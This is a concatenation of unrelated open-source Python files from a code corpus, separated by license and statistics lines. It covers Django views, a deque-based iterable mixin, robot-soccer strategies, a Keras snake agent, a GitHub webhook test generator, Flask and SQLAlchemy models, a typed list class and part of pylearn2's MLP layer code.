self.sub_category = get_object_or_404(Subcategory, subcategory_slug = self.kwargs.get('subcategory_slug'))
return Product.objects.filter(sub_category = self.sub_category)
class ProductDetailView(DetailView):
"""
    Display individual product details
"""
model = Product
def get_object(self):
"""
For unknown reasons :) you must pass self.product_slug
"""
object = get_object_or_404(Product, product_slug=self.kwargs['product_slug'])
return object
class CatalogueListView(ListView):
"""
Display all products in the db.
"""
model = Product
def get_queryset(self):
"""
Returns all categories.
"""
return Product.objects.get_queryset().all()
class CatalogueDetailView(DetailView):
"""
    Display individual product details
"""
model = Product
template_name = 'products/product_detail.html'
slug_field = 'product_slug'
def get_object(self):
"""
Call the superclass
"""
object = super(CatalogueDetailView, self).get_object()
return object
|
bsd-2-clause
| 3,212,083,904,628,984,000
| 23.671756
| 108
| 0.716584
| false
| 3.409283
| false
| false
| false
|
lcrees/knife
|
knife/_active.py
|
1
|
6481
|
# -*- coding: utf-8 -*-
'''active knives'''
from threading import local
from collections import deque
from contextlib import contextmanager
from stuf.utils import clsname
from knife._compat import loads, optimize
class _ActiveMixin(local):
'''active knife mixin'''
def __init__(self, *things, **kw):
'''
Initialize :mod:`knife`.
:argument things: incoming things
:keyword integer snapshots: snapshots to keep (default: ``5``)
'''
incoming = deque()
incoming.extend(things)
super(_ActiveMixin, self).__init__(incoming, deque(), **kw)
# working things
self._work = deque()
# holding things
self._hold = deque()
@property
@contextmanager
def _chain(self, d=optimize):
# take snapshot
snapshot = d(self._in)
# rebalance incoming with outcoming
if self._history:
self._in.clear()
self._in.extend(self._out)
# make snapshot original snapshot?
else:
self._original = snapshot
# place snapshot at beginning of snapshot stack
self._history.appendleft(snapshot)
# move incoming things to working things
self._work.extend(self._in)
yield
out = self._out
# clear outgoing things
out.clear()
# extend outgoing things with holding things
out.extend(self._hold)
# clear working things
self._work.clear()
# clear holding things
self._hold.clear()
@property
def _iterable(self):
# derived from Raymond Hettinger Python Cookbook recipe # 577155
call = self._work.popleft
try:
while 1:
yield call()
except IndexError:
pass
def _append(self, thing):
# append thing after other holding things
self._hold.append(thing)
return self
def _xtend(self, things):
# place things after holding things
self._hold.extend(things)
return self
def _prependit(self, things, d=optimize):
# take snapshot
snapshot = d(self._in)
# make snapshot original snapshot?
if self._original is None:
self._original = snapshot
# place snapshot at beginning of snapshot stack
self._history.appendleft(snapshot)
# place thing before other holding things
self._in.extendleft(reversed(things))
return self
def _appendit(self, things, d=optimize):
# take snapshot
snapshot = d(self._in)
# make snapshot original snapshot?
if self._original is None:
self._original = snapshot
# place snapshot at beginning of snapshot stack
self._history.appendleft(snapshot)
# place things after other incoming things
self._in.extend(things)
return self
def _pipeit(self, knife):
knife.clear()
knife._history.clear()
knife._history.extend(self._history)
knife._original = self._original
knife._baseline = self._baseline
knife._out.extend(self._out)
knife._worker = self._worker
knife._args = self._args
knife._kw = self._kw
knife._wrapper = self._wrapper
knife._pipe = self
return knife
def _unpipeit(self):
piped = self._pipe
piped.clear()
piped._history.clear()
piped._history.extend(self._history)
piped._original = self._original
piped._baseline = self._baseline
piped._out.extend(self._out)
piped._worker = self._worker
piped._args = self._args
piped._kw = self._kw
piped._wrapper = self._wrapper
self.clear()
return piped
def _repr(self, clsname_=clsname, list_=list):
# object representation
return self._REPR.format(
self.__module__,
clsname_(self),
list_(self._in),
list_(self._work),
list_(self._hold),
list_(self._out),
)
def _len(self, len=len):
# length of incoming things
return len(self._in)
class _OutMixin(_ActiveMixin):
'''active output mixin'''
def _undo(self, snapshot=0, loads_=loads):
# clear everything
self.clear()
# if specified, use a specific snapshot
if snapshot:
self._history.rotate(-(snapshot - 1))
self._in.extend(loads_(self._history.popleft()))
return self
def _snapshot(self, d=optimize):
# take baseline snapshot of incoming things
self._baseline = d(self._in)
return self
def _rollback(self, loads_=loads):
# clear everything
self.clear()
# clear snapshots
self._clearsp()
# revert to baseline snapshot of incoming things
self._in.extend(loads_(self._baseline))
return self
def _revert(self, loads_=loads):
# clear everything
self.clear()
# clear snapshots
self._clearsp()
# clear baseline
self._baseline = None
# restore original snapshot of incoming things
self._in.extend(loads_(self._original))
return self
def _clear(self, list_=list):
# clear worker
self._worker = None
# clear worker positional arguments
self._args = ()
# clear worker keyword arguments
self._kw = {}
# default iterable wrapper
self._wrapper = list_
# clear pipe
self._pipe = None
# clear incoming things
self._in.clear()
# clear working things
self._work.clear()
# clear holding things
self._hold.clear()
# clear outgoing things
self._out.clear()
return self
def _iterate(self, iter_=iter):
return iter_(self._out)
def _peek(self, len_=len, list_=list):
wrap, out = self._wrapper, self._in
value = list_(wrap(i) for i in out) if self._each else wrap(out)
self._each = False
self._wrapper = list_
return value[0] if len_(value) == 1 else value
def _get(self, len_=len, list_=list):
wrap, out = self._wrapper, self._out
value = list_(wrap(i) for i in out) if self._each else wrap(out)
self._each = False
self._wrapper = list_
return value[0] if len_(value) == 1 else value
|
bsd-3-clause
| -5,760,023,825,560,073,000
| 28.193694
| 72
| 0.569511
| false
| 4.314913
| false
| false
| false
|
agingrasc/StrategyIA
|
ai/STA/Strategy/StrategyBook.py
|
1
|
1930
|
# Under MIT license, see LICENSE.txt
""" Livre des stratégies. """
from .HumanControl import HumanControl
from .SimpleDefense import SimpleDefense
from .SimpleOffense import SimpleOffense
from .DoNothing import DoNothing
class StrategyBook(object):
"""
    This class retrieves the strategies registered in the strategy
    configuration and exposes them to the Behavior Tree in charge of
    selecting the current strategy.
"""
def __init__(self, p_info_manager):
self.strategy_book = {'SimpleDefense' : SimpleDefense,
'SimpleOffense' : SimpleOffense,
'HumanControl' : HumanControl,
'DoNothing' : DoNothing }
self.info_manager = p_info_manager
def get_strategies_name_list(self):
return list(self.strategy_book.keys())
def ball_in_offense_zone(self):
self.team_zone_side = "left" # constante bidon TODO: trouver une facon de demander au InfoManager notre zone initiale
self.ball_x_position = self.info_manager.get_ball_position().x
if self.team_zone_side == "left":
return self.ball_x_position > 0
return self.ball_x_position < 0
def most_opponents_in_our_zone(self):
pass
def get_optimal_strategy(self):
# simple choice
if self.ball_in_offense_zone():
self.chosen_strategy = SimpleOffense
else:
self.chosen_strategy = SimpleDefense
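        # NOTE: the choice above is currently overridden; DoNothing is forced
        # unconditionally before returning.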
self.chosen_strategy = DoNothing
return self.chosen_strategy
def get_strategy(self, strategy_name):
return self.strategy_book[strategy_name]
def debug_show_all_players_tactics(self):
for i in range(0,6):
debug_string = ""
debug_string += "Robot:" + str(i) + str(self.info_manager.get_player_tactic(i))
print(debug_string)
|
mit
| -4,660,321,697,038,851,000
| 33.321429
| 126
| 0.631634
| false
| 3.674952
| false
| false
| false
|
s-macke/Kerasimo
|
models/snake.py
|
1
|
1336
|
from keras.models import Sequential, load_model
from keras.layers import *
from qlearning4k.games import Snake
from keras.optimizers import *
from qlearning4k import Agent
from lib import kerasimo
grid_size = 10
nb_frames = 4
nb_actions = 5
snake = Snake(grid_size)
model = load_model('models/snake.hdf5')
#model = Sequential()
#model.add(Conv2D(16, (3, 3), activation='relu', input_shape=(nb_frames, grid_size, grid_size)))
#model.add(Conv2D(32, (3, 3), activation='relu'))
#model.add(Flatten())
#model.add(Dense(256, activation='relu'))
#model.add(Dense(nb_actions))
#model.compile(RMSprop(), 'MSE')
agent = Agent(model=model, memory_size=-1, nb_frames=nb_frames)
#model.save('/tmp/snake1.hdf5')
#agent.train(snake, batch_size=64, nb_epoch=10000, gamma=0.8)
#model.save('/tmp/snake2.hdf5')
#agent.play(snake)
snake.reset()
agent.clear_frames()
S = agent.get_game_data(snake)
game_over = False
frames = list()
frames.append(S[0])
while not game_over:
q = model.predict(S)[0]
possible_actions = snake.get_possible_actions()
q = [q[i] for i in possible_actions]
action = possible_actions[np.argmax(q)]
snake.play(action)
S = agent.get_game_data(snake)
frames.append(S[0])
game_over = snake.is_over()
print(np.asarray(frames).shape)
kerasimo.ToSVG('snake', model, np.array(frames), showarrows=False, columns=[1,3,3,10,10,1])
|
mit
| -1,961,486,161,902,618,600
| 28.688889
| 96
| 0.719311
| false
| 2.656064
| false
| false
| false
|
tasleson/lsm-ci
|
testing/github_event_gen.py
|
1
|
2009
|
"""
Used for testing the service locally
"""
import argparse
import hashlib
import hmac
import os
import requests
import json
GIT_SECRET = os.getenv("GIT_SECRET", "")
PORT_NUM = os.getenv("PORT_NUM", "43301")
IP_ADDRESS = os.getenv("IP_ADDRESS", "127.0.0.1")
def gen_signature(data):
"""
Generate the signature for the data.
:param data: Data to generate signature for
:return: "sha1=<hexdigest>"
"""
h = hmac.new(GIT_SECRET.encode("utf-8"), data.encode("utf-8"), hashlib.sha1)
s = "sha1=" + h.hexdigest()
return s.encode("utf-8")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="github event creation")
parser.add_argument(
"--clone_url",
dest="clone_url",
default="https://github.com/tasleson/libstoragemgmt.git",
)
parser.add_argument("--branch", dest="branch", default="master")
parser.add_argument(
"--sha1",
dest="sha1",
default="4a956debabed9d02e7c076d85d1f2d18eb11b549",
)
args = parser.parse_args()
url = "http://%s:%s/event_handler" % (IP_ADDRESS, PORT_NUM)
head = {
"Content-type": "application/json",
"X-Hub-Signature": "",
"X-Github-Event": "pull_request",
}
body = dict()
body["pull_request"] = dict()
body["pull_request"]["base"] = dict()
body["pull_request"]["head"] = dict()
body["pull_request"]["base"]["repo"] = dict()
body["pull_request"]["head"]["repo"] = dict()
body["pull_request"]["base"]["repo"][
"full_name"
] = "libstorage/libstoragemgmt"
body["pull_request"]["head"]["repo"]["clone_url"] = args.clone_url
body["pull_request"]["head"]["sha"] = args.sha1
body["pull_request"]["head"]["ref"] = args.branch
body_json = json.dumps(body)
head["X-Hub-Signature"] = gen_signature(body_json)
response = requests.post(
url=url, headers=head, data=body_json.encode("utf-8")
)
print("status = %d" % int(response.status_code))
|
apache-2.0
| -6,225,019,245,875,923,000
| 24.75641
| 80
| 0.599303
| false
| 3.337209
| false
| false
| false
|
mfa/weight-app
|
weight/manage.py
|
1
|
1205
|
#!/usr/bin/env python
""" Part of weight_app
:copyright: (c) 2012 by Andreas Madsack.
:license: BSD, see LICENSE for more details.
"""
from flask.ext.script import Manager
from main import create_app, db
from utils import new_pw, get_emailaddress
# flask-Script
manager = Manager(create_app)
@manager.command
def createdb():
""" Create Database (with initial user)
"""
import models
db.create_all()
add_user(u'admin', email=get_emailaddress())
@manager.command
def add_user(username, email, quiet=False):
""" Adds a User to the database with a random password and prints
the random password.
"""
from models import User
if User.query.get(username):
print("User %s already exists!" % username)
return
u = User(username=username,
email=email.strip())
pw = new_pw()
u.set_password(pw)
if not quiet:
print("Password for %s set to: %s" % (username, pw))
db.session.add(u)
db.session.commit()
@manager.command
def import_from_xml(filename, username):
from utils import import_weight_from_xml
import_weight_from_xml(filename, username)
if __name__ == '__main__':
manager.run()
|
bsd-3-clause
| -5,661,920,201,830,214,000
| 23.591837
| 69
| 0.651452
| false
| 3.554572
| false
| false
| false
|
jlgoldman/writetogov
|
database/db_models.py
|
1
|
4654
|
from geoalchemy2 import Geography
from sqlalchemy.dialects import postgresql
from database import db
from util import fips
from util import text
SRID = 4326
# This table is auto-generated by shp2sql based on the TIGER shapefile
# tl_2016_us_cd115.zip (https://www.census.gov/cgi-bin/geo/shapefiles/index.php?year=2016&layergroup=Congressional+Districts+%28115%29).
# We then augment it with additional columns for state
# name and code, since by default it only includes FIPS codes.
#
# Table creation was initiated using:
# shp2pgsql -G -s 4269:4326 tl_2016_us_cd115.shp district > district_raw.sql
#
# Table altered using:
# ALTER TABLE district
# ADD COLUMN state_name character varying(50),
# ADD COLUMN state_code character varying(2),
# ADD COLUMN district_code character varying(4);
# CREATE INDEX idx_district_state_code ON district USING btree (state_code);
# CREATE INDEX idx_district_district_code ON district USING btree (district_code);
#
# Then extra columns are populated using database/populate_district_codes.py
class District(db.Model):
gid = db.Column(db.Integer, primary_key=True)
statefp = db.Column(db.String(2), index=True) # FIPS code
cd115fp = db.Column(db.String(2), index=True) # FIPS code
# Added manually
state_name = db.Column(db.String(50))
state_code = db.Column(db.String(2), index=True)
district_code = db.Column(db.String(4), index=True)
geoid = db.Column(db.String(4))
namelsad = db.Column(db.String(41))
lsad = db.Column(db.String(2))
cdsessn = db.Column(db.String(3))
mtfcc = db.Column(db.String(5))
funcstat = db.Column(db.String(1))
aland = db.Column(postgresql.DOUBLE_PRECISION)
awater = db.Column(postgresql.DOUBLE_PRECISION)
intptlat = db.Column(db.String(11))
intptlon = db.Column(db.String(12))
geog = db.Column(Geography('MultiPolygon', srid=SRID))
class Rep(db.Model):
class Chamber(object):
HOUSE = 'h'
SENATE = 's'
class Status(object):
ACTIVE = 'a'
LEFT_CONGRESS = 'l'
DEFEATED_IN_GENERAL = 'd'
DEFEATED_IN_PRIMARY = 'e'
RETIRING = 'r'
SEEKING_OTHER_OFFICE = 'o'
PENDING_RESULT = 'p'
rep_id = db.Column(db.Integer, primary_key=True)
first_name = db.Column(db.String(100))
last_name = db.Column(db.String(100))
state_code = db.Column(db.String(2), index=True)
district_number = db.Column(db.Integer, index=True)
district_code = db.Column(db.String(4), index=True)
party_code = db.Column(db.String(1), index=True)
chamber = db.Column(db.String(1), index=True)
email_link = db.Column(db.String(100))
email = db.Column(db.String(100))
website = db.Column(db.String(255))
address_dc = db.Column(db.String(255))
phone_dc = db.Column(db.String(20))
bioguide_id = db.Column(db.String(10))
status = db.Column(db.String(1), index=True)
status_note = db.Column(db.String(100))
def state_name(self):
return fips.get_state_name_for_code(self.state_code)
def district_ordinal(self):
if self.chamber == self.Chamber.HOUSE:
return text.ordinal(self.district_number) if self.district_number > 0 else 'At-Large'
return None
class Reminder(db.Model):
class Frequency(object):
WEEKLY = 'w'
MONTHLY = 'm'
class Status(object):
ACTIVE = 'a'
UNSUBSCRIBED = 'u'
reminder_id = db.Column(db.BigInteger, primary_key=True)
email = db.Column(db.String(100), index=True)
frequency = db.Column(db.String(1), index=True)
status = db.Column(db.String(1), index=True)
last_contacted = db.Column(db.DateTime(timezone=True), index=True)
time_created = db.Column(db.DateTime(timezone=True))
time_updated = db.Column(db.DateTime(timezone=True))
class RepMailing(db.Model):
rep_mailing_id = db.Column(db.BigInteger, primary_key=True)
rep_id = db.Column(db.Integer, index=True)
email = db.Column(db.String(100), index=True)
stripe_charge_id = db.Column(db.String(50), index=True)
lob_letter_id = db.Column(db.String(50), index=True)
time_created = db.Column(db.DateTime(timezone=True))
time_updated = db.Column(db.DateTime(timezone=True))
class Issue(db.Model):
issue_id = db.Column(db.BigInteger, primary_key=True)
creator_email = db.Column(db.String(100), index=True)
creator_name = db.Column(db.String(100))
title = db.Column(db.String(100))
description = db.Column(db.Text)
rep_ids = db.Column(postgresql.ARRAY(db.Integer))
time_created = db.Column(db.DateTime(timezone=True))
time_updated = db.Column(db.DateTime(timezone=True))
|
bsd-3-clause
| 6,247,504,885,244,312,000
| 37.783333
| 136
| 0.68049
| false
| 3.026008
| false
| false
| false
|
zbraniecki/pyast
|
pyast/typedlist.py
|
1
|
4961
|
import sys
import re
# Temporary solution for string/unicode in py2 vs py3
if sys.version >= '3':
basestring = str
class TypedList(list):
"""Strongly typed list
All elements of the list must be one of the given types.
Attributes:
init - initial values
types - allowed types
null - can the list be null
Types may be either classes or strings. If types are strings then the value
of the field may be only a string matching one of the types.
examples:
        TypedList((Identifier, Literal), [Identifier(), Identifier()])
        TypedList(Expression, [], null=True)
ast.field(["+","-","+"], ("+","-","="))
"""
_type = 'class' # class | str | pattern
def __init__(self, types, init=None, null=False):
super(TypedList, self).__init__()
if isinstance(types, basestring) or not hasattr(types, '__iter__'):
self._types = (types,)
else:
self._types = types
tset = set([type(t) for t in self._types])
self._null = null
if len(tset) == 1:
tset = tset.pop()
self.__enforceType = self.__selectEnforcementMethod(tset)
else:
self.__enforceType = self.__enforceTypeMixed
if init:
self.extend(init)
elif null is False:
raise TypeError("This list must not be empty")
def __repr__(self, template=None):
#fields = self._fields
#if len(field) >= len(list_template):
# list_template += [getfillvalue(self, i)] * (len(field)-len(list_template)+1)
# fields[i] = ''.join(['%s%s' % x for x in zip_longest(
# list_template,
# map(stringify, field),
# fillvalue=''
# )])
#else:
# fields[i] = ', '.join(map(stringify, field))
#return self._template % fields
if template is None:
return list.__repr__(self)
else:
s = template()
return s
def __selectEnforcementMethod(self, t):
if issubclass(t, (basestring, int)):
return self.__enforceTypeStrInt
elif t is re._pattern_type:
return self.__enforceTypePattern
elif isinstance(t, type):
return self.__enforceTypeClass
def __enforceTypeMixed(self, items):
res = []
for item in items:
et = self.__selectEnforcementMethod(type(item))
res.append(et((item,)))
if all(res):
return
raise TypeError('This list accepts only elements: %s' %
', '.join([str(t) for t in self._types]))
def __enforceTypeStrInt(self, items):
if all(i in self._types for i in items):
return True
raise TypeError('This list accepts only elements: %s' %
', '.join([str(t) for t in self._types]))
def __enforceTypeClass(self, items):
if all(isinstance(i, self._types) for i in items):
return True
raise TypeError('This list accepts only elements: %s' %
', '.join([str(t) for t in self._types]))
def __enforceTypePattern(self, items):
if all(any(j.match(i) for j in self._types) for i in items):
return True
raise TypeError('This list accepts only elements: %s' %
', '.join([str(t) for t in self._types]))
def append(self, item):
self.__enforceType((item,))
return super(TypedList, self).append(item)
def insert(self, pos, item):
self.__enforceType((item,))
return super(TypedList, self).insert(pos, item)
def extend(self, items):
self.__enforceType(items)
return super(TypedList, self).extend(items)
def pop(self, key=-1):
if self._null is False and len(self) == 1:
raise TypeError("This list must not be empty")
return super(TypedList, self).pop(key)
def __delitem__(self, k):
if self._null is False:
if type(k) is slice:
absslice = k.indices(len(self))
if absslice[1] - absslice[0] >= len(self):
raise TypeError("This list must not be empty")
elif len(self) == 1:
raise TypeError("This list must not be empty")
return list.__delitem__(self, k)
def __setitem__(self, key, value):
self.__enforceType(value if hasattr(value, '__iter__') else (value,))
return list.__setitem__(self, key, value)
def __setslice__(self, i, j, sequence):
self.__enforceType(sequence)
return list.__setslice__(self, i, j, sequence)
def __delslice__(self, i, j):
absslice = slice(i, j).indices(len(self))
if self._null is False and absslice[1] - absslice[0] >= len(self):
raise TypeError("This list must not be empty")
return list.__delslice__(self, i, j)
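# A minimal usage sketch (Identifier and Literal are the node classes
# referenced by the docstring examples above):
#
#     names = TypedList([], (Identifier, Literal), null=True)
#     names.append(Identifier())   # accepted
#     names.append(42)             # raises TypeError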
|
bsd-3-clause
| -4,534,332,588,961,025,000
| 33.93662
| 89
| 0.549083
| false
| 3.994364
| false
| false
| false
|
CKehl/pylearn2
|
pylearn2/models/mlp.py
|
1
|
166462
|
"""
Multilayer Perceptron
"""
__authors__ = "Ian Goodfellow"
__copyright__ = "Copyright 2012-2013, Universite de Montreal"
__credits__ = ["Ian Goodfellow", "David Warde-Farley"]
__license__ = "3-clause BSD"
__maintainer__ = "LISA Lab"
import logging
import math
import operator
import sys
import warnings
import numpy as np
from theano.compat import six
from theano.compat.six.moves import reduce, xrange
from theano import config
from theano.gof.op import get_debug_values
from theano.sandbox.rng_mrg import MRG_RandomStreams
from theano.sandbox.cuda.dnn import dnn_available, dnn_pool
from theano.tensor.signal.downsample import max_pool_2d
import theano.tensor as T
from pylearn2.compat import OrderedDict
from pylearn2.costs.mlp import Default
from pylearn2.expr.probabilistic_max_pooling import max_pool_channels
from pylearn2.linear import conv2d
from pylearn2.linear.matrixmul import MatrixMul
from pylearn2.model_extensions.norm_constraint import MaxL2FilterNorm
from pylearn2.models.model import Model
from pylearn2.monitor import get_monitor_doc
from pylearn2.expr.nnet import arg_of_softmax
from pylearn2.expr.nnet import pseudoinverse_softmax_numpy
from pylearn2.space import CompositeSpace
from pylearn2.space import Conv2DSpace
from pylearn2.space import Space
from pylearn2.space import VectorSpace, IndexSpace
from pylearn2.utils import function
from pylearn2.utils import is_iterable
from pylearn2.utils import py_float_types
from pylearn2.utils import py_integer_types
from pylearn2.utils import safe_union
from pylearn2.utils import safe_zip
from pylearn2.utils import safe_izip
from pylearn2.utils import sharedX
from pylearn2.utils import wraps
from pylearn2.utils import contains_inf
from pylearn2.utils import isfinite
from pylearn2.utils.data_specs import DataSpecsMapping
from pylearn2.expr.nnet import (elemwise_kl, kl, compute_precision,
compute_recall, compute_f1)
# Only to be used by the deprecation warning wrapper functions
from pylearn2.costs.mlp import L1WeightDecay as _L1WD
from pylearn2.costs.mlp import WeightDecay as _WD
from pylearn2.sandbox.rnn.models.mlp_hook import RNNWrapper
logger = logging.getLogger(__name__)
logger.debug("MLP changing the recursion limit.")
# We need this to be high enough that the big theano graphs we make
# when doing max pooling via subtensors don't cause python to complain.
# python intentionally declares stack overflow well before the stack
# segment is actually exceeded. But we can't make this value too big
# either, or we'll get seg faults when the python interpreter really
# does go over the stack segment.
# IG encountered seg faults on eos3 (a machine at the LISA lab) when using
# 50000 so for now it is set to 40000.
# I think the actual safe recursion limit can't be predicted in advance
# because you don't know how big of a stack frame each function will
# make, so there is not really a "correct" way to do this. Really the
# python interpreter should provide an option to raise the error
# precisely when you're going to exceed the stack segment.
sys.setrecursionlimit(40000)
if six.PY3:
LayerBase = six.with_metaclass(RNNWrapper, Model)
else:
LayerBase = Model
class Layer(LayerBase):
"""
Abstract class. A Layer of an MLP.
May only belong to one MLP.
Parameters
----------
kwargs : dict
Passed on to the superclass.
Notes
-----
This is not currently a Block because as far as I know the Block interface
assumes every input is a single matrix. It doesn't support using Spaces to
work with composite inputs, stacked multichannel image inputs, etc. If the
Block interface were upgraded to be that flexible, then we could make this
a block.
"""
# This enables RNN compatibility
__metaclass__ = RNNWrapper
# When applying dropout to a layer's input, use this for masked values.
# Usually this will be 0, but certain kinds of layers may want to override
# this behaviour.
dropout_input_mask_value = 0.
def get_mlp(self):
"""
Returns the MLP that this layer belongs to.
Returns
-------
mlp : MLP
The MLP that this layer belongs to, or None if it has not been
assigned to an MLP yet.
"""
if hasattr(self, 'mlp'):
return self.mlp
return None
def set_mlp(self, mlp):
"""
Assigns this layer to an MLP. This layer will then use the MLP's
random number generator, batch size, etc. This layer's name must
be unique within the MLP.
Parameters
----------
mlp : MLP
"""
assert self.get_mlp() is None
self.mlp = mlp
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
"""
Returns monitoring channels.
Parameters
----------
state_below : member of self.input_space
A minibatch of states that this Layer took as input.
            Most of the time providing state_below is unnecessary when
state is given.
state : member of self.output_space
A minibatch of states that this Layer took on during fprop.
Provided externally so that we don't need to make a second
expression for it. This helps keep the Theano graph smaller
so that function compilation runs faster.
targets : member of self.output_space
Should be None unless this is the last layer.
If specified, it should be a minibatch of targets for the
last layer.
Returns
-------
channels : OrderedDict
A dictionary mapping channel names to monitoring channels of
interest for this layer.
"""
return OrderedDict()
def fprop(self, state_below):
"""
Does the forward prop transformation for this layer.
Parameters
----------
state_below : member of self.input_space
A minibatch of states of the layer below.
Returns
-------
state : member of self.output_space
A minibatch of states of this layer.
"""
raise NotImplementedError(
str(type(self)) + " does not implement fprop.")
def cost(self, Y, Y_hat):
"""
The cost of outputting Y_hat when the true output is Y.
Parameters
----------
Y : theano.gof.Variable
The targets
Y_hat : theano.gof.Variable
The predictions.
Assumed to be the output of the layer's `fprop` method.
            The implementation is permitted to do things like look at the
ancestors of `Y_hat` in the theano graph. This is useful for
e.g. computing numerically stable *log* probabilities when
`Y_hat` is the *probability*.
Returns
-------
cost : theano.gof.Variable
A Theano scalar describing the cost.
"""
raise NotImplementedError(
str(type(self)) + " does not implement mlp.Layer.cost.")
def cost_from_cost_matrix(self, cost_matrix):
"""
        The final scalar cost computed from the cost matrix.
Parameters
----------
cost_matrix : WRITEME
Examples
--------
>>> # C = model.cost_matrix(Y, Y_hat)
>>> # Do something with C like setting some values to 0
>>> # cost = model.cost_from_cost_matrix(C)
"""
raise NotImplementedError(
str(type(self)) + " does not implement "
"mlp.Layer.cost_from_cost_matrix.")
def cost_matrix(self, Y, Y_hat):
"""
The element wise cost of outputting Y_hat when the true output is Y.
Parameters
----------
Y : WRITEME
Y_hat : WRITEME
Returns
-------
WRITEME
"""
raise NotImplementedError(
str(type(self)) + " does not implement mlp.Layer.cost_matrix")
def set_weights(self, weights):
"""
Sets the weights of the layer.
Parameters
----------
weights : ndarray
A numpy ndarray containing the desired weights of the layer. This
docstring is provided by the Layer base class. Layer subclasses
should add their own docstring explaining the subclass-specific
format of the ndarray.
"""
raise NotImplementedError(
str(type(self)) + " does not implement set_weights.")
def get_biases(self):
"""
Returns the value of the biases of the layer.
Returns
-------
biases : ndarray
A numpy ndarray containing the biases of the layer. This docstring
is provided by the Layer base class. Layer subclasses should add
their own docstring explaining the subclass-specific format of the
ndarray.
"""
raise NotImplementedError(
str(type(self)) + " does not implement "
"get_biases (perhaps because the class has no biases).")
def set_biases(self, biases):
"""
Sets the biases of the layer.
Parameters
----------
biases : ndarray
A numpy ndarray containing the desired biases of the layer. This
docstring is provided by the Layer base class. Layer subclasses
should add their own docstring explaining the subclass-specific
format of the ndarray.
"""
raise NotImplementedError(
str(type(self)) + " does not implement "
"set_biases (perhaps because the class has no biases).")
def get_weights_format(self):
"""
Returns a description of how to interpret the weights of the layer.
Returns
-------
format: tuple
Either ('v', 'h') or ('h', 'v').
('v', 'h') means a weight matrix of shape
(num visible units, num hidden units),
while ('h', 'v') means the transpose of it.
"""
raise NotImplementedError
def get_weight_decay(self, coeff):
"""
Provides an expression for a squared L2 penalty on the weights.
Parameters
----------
coeff : float or tuple
The coefficient on the weight decay penalty for this layer.
This docstring is provided by the Layer base class. Individual
Layer subclasses should add their own docstring explaining the
format of `coeff` for that particular layer. For most ordinary
layers, `coeff` is a single float to multiply by the weight
decay term. Layers containing many pieces may take a tuple or
nested tuple of floats, and should explain the semantics of
the different elements of the tuple.
Returns
-------
weight_decay : theano.gof.Variable
An expression for the weight decay penalty term for this
layer.
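        Examples
        --------
        >>> # Sketch: the squared L2 penalty contributed by a concrete layer,
        >>> # scaled by a coefficient of 1e-4.
        >>> # penalty = layer.get_weight_decay(1e-4)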
"""
raise NotImplementedError(
str(type(self)) + " does not implement get_weight_decay.")
def get_l1_weight_decay(self, coeff):
"""
Provides an expression for an L1 penalty on the weights.
Parameters
----------
coeff : float or tuple
The coefficient on the L1 weight decay penalty for this layer.
This docstring is provided by the Layer base class. Individual
Layer subclasses should add their own docstring explaining the
format of `coeff` for that particular layer. For most ordinary
layers, `coeff` is a single float to multiply by the weight
decay term. Layers containing many pieces may take a tuple or
nested tuple of floats, and should explain the semantics of
the different elements of the tuple.
Returns
-------
weight_decay : theano.gof.Variable
An expression for the L1 weight decay penalty term for this
layer.
"""
raise NotImplementedError(
str(type(self)) + " does not implement get_l1_weight_decay.")
def set_input_space(self, space):
"""
Tells the layer to prepare for input formatted according to the
given space.
Parameters
----------
space : Space
The Space the input to this layer will lie in.
Notes
-----
This usually resets parameters.
"""
raise NotImplementedError(
str(type(self)) + " does not implement set_input_space.")
class MLP(Layer):
"""
A multilayer perceptron.
Note that it's possible for an entire MLP to be a single layer of a larger
MLP.
Parameters
----------
layers : list
A list of Layer objects. The final layer specifies the output space
of this MLP.
batch_size : int, optional
        If specified, every batch must contain this number of examples.
        Mostly useful if one of your layers involves a Theano op like
        convolution that requires a hard-coded batch size.
nvis : int, optional
Number of "visible units" (input units). Equivalent to specifying
`input_space=VectorSpace(dim=nvis)`. Note that certain methods require
a different type of input space (e.g. a Conv2Dspace in the case of
convnets). Use the input_space parameter in such cases. Should be
None if the MLP is part of another MLP.
input_space : Space object, optional
A Space specifying the kind of input the MLP accepts. If None,
input space is specified by nvis. Should be None if the MLP is
part of another MLP.
input_source : string or (nested) tuple of strings, optional
        A (nested) tuple of strings specifying the input sources this
MLP accepts. The structure should match that of input_space. The
default is 'features'. Note that this argument is ignored when
the MLP is nested.
target_source : string or (nested) tuple of strings, optional
        A (nested) tuple of strings specifying the target sources this
MLP accepts. The structure should match that of target_space. The
default is 'targets'. Note that this argument is ignored when
the MLP is nested.
    layer_name : str, optional
        The name of the MLP layer. Should be None if the MLP is
        not part of another MLP.
seed : WRITEME
monitor_targets : bool, optional
Default: True
If true, includes monitoring channels that are functions of the
targets. This can be disabled to allow monitoring on monitoring
datasets that do not include targets.
kwargs : dict
Passed on to the superclass.
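    Examples
    --------
    >>> # A minimal sketch of a one-hidden-layer classifier, using layer
    >>> # classes defined later in this module.
    >>> # mlp = MLP(nvis=784,
    >>> #           layers=[Sigmoid(layer_name='h0', dim=500, irange=0.05),
    >>> #                   Softmax(layer_name='y', n_classes=10,
    >>> #                           irange=0.05)])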
"""
def __init__(self, layers, batch_size=None, input_space=None,
input_source='features', target_source='targets',
nvis=None, seed=None, layer_name=None, monitor_targets=True,
**kwargs):
super(MLP, self).__init__(**kwargs)
self.seed = seed
assert isinstance(layers, list)
assert all(isinstance(layer, Layer) for layer in layers)
assert len(layers) >= 1
self.layer_name = layer_name
self.layer_names = set()
for layer in layers:
assert layer.get_mlp() is None
if layer.layer_name in self.layer_names:
raise ValueError("MLP.__init__ given two or more layers "
"with same name: " + layer.layer_name)
layer.set_mlp(self)
self.layer_names.add(layer.layer_name)
self.layers = layers
self.batch_size = batch_size
self.force_batch_size = batch_size
self._input_source = input_source
self._target_source = target_source
self.monitor_targets = monitor_targets
if input_space is not None or nvis is not None:
self._nested = False
self.setup_rng()
# check if the layer_name is None (the MLP is the outer MLP)
assert layer_name is None
if nvis is not None:
input_space = VectorSpace(nvis)
# Check whether the input_space and input_source structures match
try:
DataSpecsMapping((input_space, input_source))
except ValueError:
raise ValueError("The structures of `input_space`, %s, and "
"`input_source`, %s do not match. If you "
"specified a CompositeSpace as an input, "
"be sure to specify the data sources as well."
% (input_space, input_source))
self.input_space = input_space
self._update_layer_input_spaces()
else:
self._nested = True
self.freeze_set = set([])
@property
def input_source(self):
assert not self._nested, "A nested MLP does not have an input source"
return self._input_source
@property
def target_source(self):
